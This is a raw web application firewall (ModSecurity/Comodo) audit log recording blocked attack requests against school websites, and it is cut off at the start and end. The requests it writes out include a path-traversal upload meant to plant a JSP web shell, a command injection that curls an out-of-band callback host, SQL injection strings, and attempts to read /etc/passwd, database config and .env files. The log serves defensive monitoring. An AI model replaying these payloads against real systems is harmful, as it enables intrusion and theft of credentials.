aEAiZNhPZJx8OfNaLCrr0wAAANA 103.236.140.4 43292 103.236.140.4 8181 --aa26977a-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173580333 --aa26977a-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --7392593c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7392593c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749037523517222 6419 (- - -) Stopwatch2: 1749037523517222 6419; combined=4613, p1=486, p2=4088, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7392593c-Z-- --5731b077-A-- [04/Jun/2025:18:45:23 +0700] aEAx0zNXNn6zAsHj7JDKpwAAAEY 103.236.140.4 54664 103.236.140.4 8181 --5731b077-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 716 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173624295 --5731b077-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --5731b077-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5731b077-E-- --5731b077-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749037523523505 4999 (- - -) Stopwatch2: 1749037523523505 4999; combined=3385, p1=373, p2=2977, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5731b077-Z-- --b5b1e465-A-- [04/Jun/2025:18:45:23 +0700] aEAx05LmnxTwEPX7IuZ1zwAAAIY 103.236.140.4 54678 103.236.140.4 8181 --b5b1e465-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 170 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171343232 --b5b1e465-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0us2vpgpeonc6qdbef0n6hdbb6q3c7s7.oast.me`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --b5b1e465-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5b1e465-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749037523524301 4759 (- - -) Stopwatch2: 1749037523524301 4759; combined=3151, p1=636, p2=2353, p3=62, p4=53, p5=47, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5b1e465-Z-- --44bb5732-A-- [04/Jun/2025:19:23:07 +0700] aEA6qzNXNn6zAsHj7JDS3gAAAFY 103.236.140.4 39048 103.236.140.4 8181 --44bb5732-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0 --44bb5732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44bb5732-E-- --44bb5732-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787241602 2534 (- - -) Stopwatch2: 1749039787241602 2534; combined=1143, p1=419, p2=692, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44bb5732-Z-- --53707751-A-- [04/Jun/2025:19:23:07 +0700] aEA6qzNXNn6zAsHj7JDS4QAAAFM 103.236.140.4 39056 103.236.140.4 8181 --53707751-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 25 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: application/x-www-form-urlencoded --53707751-C-- type='|cat /etc/passwd||' --53707751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53707751-E-- --53707751-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787250089 1260 (- - -) Stopwatch2: 1749039787250089 1260; combined=434, p1=306, p2=105, p3=0, p4=0, p5=23, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53707751-Z-- --566e4978-A-- [04/Jun/2025:19:23:07 +0700] aEA6q5LmnxTwEPX7IuZ9ggAAAJA 103.236.140.4 39060 103.236.140.4 8181 --566e4978-B-- POST /guest_auth/guestIsUp.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close --566e4978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --566e4978-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||up.smkn22jakarta.sch.id|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749039787250710 835 (- - -) Stopwatch2: 1749039787250710 835; combined=274, p1=245, p2=0, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --566e4978-Z-- --fecaf85c-A-- [04/Jun/2025:19:23:07 +0700] aEA6qzNXNn6zAsHj7JDS4gAAAE0 103.236.140.4 39062 103.236.140.4 8181 --fecaf85c-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://up.smkn22jakarta.sch.id/zentao/user-login.html Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 72 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Content-Type: application/x-www-form-urlencoded --fecaf85c-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --fecaf85c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fecaf85c-E-- --fecaf85c-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787250693 2146 (- - -) Stopwatch2: 1749039787250693 2146; combined=1289, p1=275, p2=986, p3=0, p4=0, p5=27, sr=54, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fecaf85c-Z-- --30d1456e-A-- [04/Jun/2025:19:23:07 +0700] aEA6q5LmnxTwEPX7IuZ9gwAAAIg 103.236.140.4 39058 103.236.140.4 8181 --30d1456e-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/116.0 Safari/537.36 --30d1456e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30d1456e-E-- --30d1456e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787250580 2431 (- - -) Stopwatch2: 1749039787250580 2431; combined=523, p1=282, p2=216, p3=0, p4=0, p5=25, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30d1456e-Z-- --80a39b63-A-- [04/Jun/2025:19:23:07 +0700] aEA6q5LmnxTwEPX7IuZ9hAAAAIM 103.236.140.4 39064 103.236.140.4 8181 --80a39b63-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 --80a39b63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80a39b63-E-- --80a39b63-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787252640 3339 (- - -) Stopwatch2: 1749039787252640 3339; combined=2367, p1=348, p2=1992, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80a39b63-Z-- --994cb808-A-- [04/Jun/2025:19:23:08 +0700] aEA6rNhPZJx8OfNaLCoLCQAAANc 103.236.140.4 39086 103.236.140.4 8181 --994cb808-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 58 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded --994cb808-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --994cb808-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --994cb808-E-- --994cb808-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039788077496 2204 (- - -) Stopwatch2: 1749039788077496 2204; combined=679, p1=455, p2=190, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994cb808-Z-- --0f4b6641-A-- [04/Jun/2025:19:23:08 +0700] aEA6rDNXNn6zAsHj7JDS5AAAAEs 103.236.140.4 39090 103.236.140.4 8181 --0f4b6641-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 --0f4b6641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f4b6641-E-- --0f4b6641-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039788082129 1632 (- - -) Stopwatch2: 1749039788082129 1632; combined=493, p1=352, p2=115, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f4b6641-Z-- --43ff2e7b-A-- [04/Jun/2025:19:23:11 +0700] aEA6r9hPZJx8OfNaLCoLDAAAAMg 103.236.140.4 39146 103.236.140.4 8181 --43ff2e7b-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 42 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.4 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded --43ff2e7b-C-- var={"body":{"file":"file:///etc/passwd"}} --43ff2e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ff2e7b-E-- --43ff2e7b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /sys/ui/extend/varkind/custom.jsp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039791081284 28889 (- - -) Stopwatch2: 1749039791081284 28889; combined=54693, p1=433, p2=104, p3=0, p4=0, p5=27095, sr=118, sw=0, l=0, gc=27061 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ff2e7b-Z-- --a9cff603-A-- [04/Jun/2025:19:23:15 +0700] aEA6s9hPZJx8OfNaLCoLFQAAAMk 103.236.140.4 39242 103.236.140.4 8181 --a9cff603-B-- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded --a9cff603-C-- "1":1 --a9cff603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9cff603-E-- --a9cff603-H-- Message: Access denied with code 403 (phase 2). Matched phrase "config/database.php" at ARGS:picUrl. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: config/database.php found within ARGS:picUrl: ../config/database.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039795072261 2972 (- - -) Stopwatch2: 1749039795072261 2972; combined=1762, p1=514, p2=1206, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9cff603-Z-- --34b75770-A-- [04/Jun/2025:19:54:43 +0700] aEBCE9hPZJx8OfNaLCoR4wAAAMk 103.236.140.4 38708 103.236.140.4 8181 --34b75770-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 147.182.200.94 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 147.182.200.94 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --34b75770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34b75770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at 